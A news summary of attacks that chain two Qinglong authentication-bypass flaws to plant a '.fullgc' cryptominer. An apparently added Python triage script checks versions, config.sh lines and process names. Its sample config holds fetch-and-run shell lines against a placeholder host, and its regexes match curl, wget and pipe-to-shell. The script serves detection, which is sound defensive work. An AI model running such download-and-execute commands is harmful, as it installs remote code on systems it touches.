
Hackers exploit Qinglong vulnerabilities to deploy cryptominers


As reported by Bleeping Computer, hackers are actively exploiting two authentication bypass vulnerabilities in the popular open-source task scheduling tool Qinglong to deploy cryptominers on developers' servers. The exploitation began in early February, prior to the public disclosure of the security flaws at the end of the month.

The vulnerabilities, identified as CVE-2026-3965 and CVE-2026-4047, affect Qinglong versions 2.20.1 and older. They can be chained together to achieve remote code execution. The flaws stem from a mismatch between the security middleware's assumptions and the Express.js routing behavior, allowing attackers to bypass authentication. Attackers have been targeting publicly exposed Qinglong panels since February 7, modifying the config.sh file to download and execute a cryptominer disguised as a hidden process named ".fullgc". This process consumes significant CPU resources, mimicking an innocuous but intensive system process to evade detection.

The downloaded miner variants support multiple architectures, including Linux x86_64, ARM64, and macOS. While Qinglong maintainers released an update, the initial fix was insufficient, with a more effective patch addressing the authentication bypass arriving later. The ongoing exploitation highlights the risks associated with unpatched open-source software.
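A triage check built from the indicators reported above, as an added example that is not from the original article or the Qinglong project. It tests a version string against the affected range, reviews the text of a config.sh for the reported miner name or download-and-run lines, and matches process names against ".fullgc"; the regex heuristics, function names and sample input are assumptions constructed for illustration.

```python
import re

LAST_AFFECTED = (2, 20, 1)   # "versions 2.20.1 and older" per the article
MINER_NAME = ".fullgc"       # hidden process name reported in the article

# Assumed heuristics (not published indicators): a fetch tool combined with
# an execution idiom on the same config line.
FETCH = re.compile(r"\b(curl|wget)\b", re.I)
EXEC = re.compile(r"\|\s*(ba|z|da)?sh\b|\bchmod\s+\+x\b|\bnohup\b", re.I)

def is_affected(version):
    """True if version <= 2.20.1. False is not proof of safety: the article
    says the first fix was insufficient and names no fixed release."""
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    if not nums:
        raise ValueError(f"no version number in {version!r}")
    return tuple(nums + [0] * (3 - len(nums))) <= LAST_AFFECTED

def scan_config(text):
    """Return (line_no, reason, line) for config.sh lines worth reviewing."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank or comment: never executed
        if MINER_NAME in line:
            findings.append((no, "miner-name", line))
        elif FETCH.search(line) and EXEC.search(line):
            findings.append((no, "fetch-and-exec", line))
    return findings

def suspicious_processes(procs):
    """procs: (pid, command) pairs, e.g. parsed from `ps -eo pid,comm`."""
    return [(p, c) for p, c in procs if c.rsplit("/", 1)[-1] == MINER_NAME]

# Constructed sample input; hosts and settings are placeholders.
SAMPLE_CONFIG = """\
# constructed sample, not a real Qinglong config
EXAMPLE_SETTING="true"
# wget http://example.invalid/old.sh | sh
curl -fsSL http://example.invalid/payload -o /tmp/.fullgc
wget -qO- http://example.invalid/p.sh | sh
"""
SAMPLE_PROCS = [(1, "node"), (4242, ".fullgc"), (4300, "/tmp/.fullgc")]

if __name__ == "__main__":
    print(is_affected("2.20.1"), scan_config(SAMPLE_CONFIG))
    print(suspicious_processes(SAMPLE_PROCS))
```

Any hit is a prompt for manual review of the panel and its host, not a verdict; a clean result on an exposed panel running an affected version still warrants patching and a config audit.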

Source: Bleeping Computer
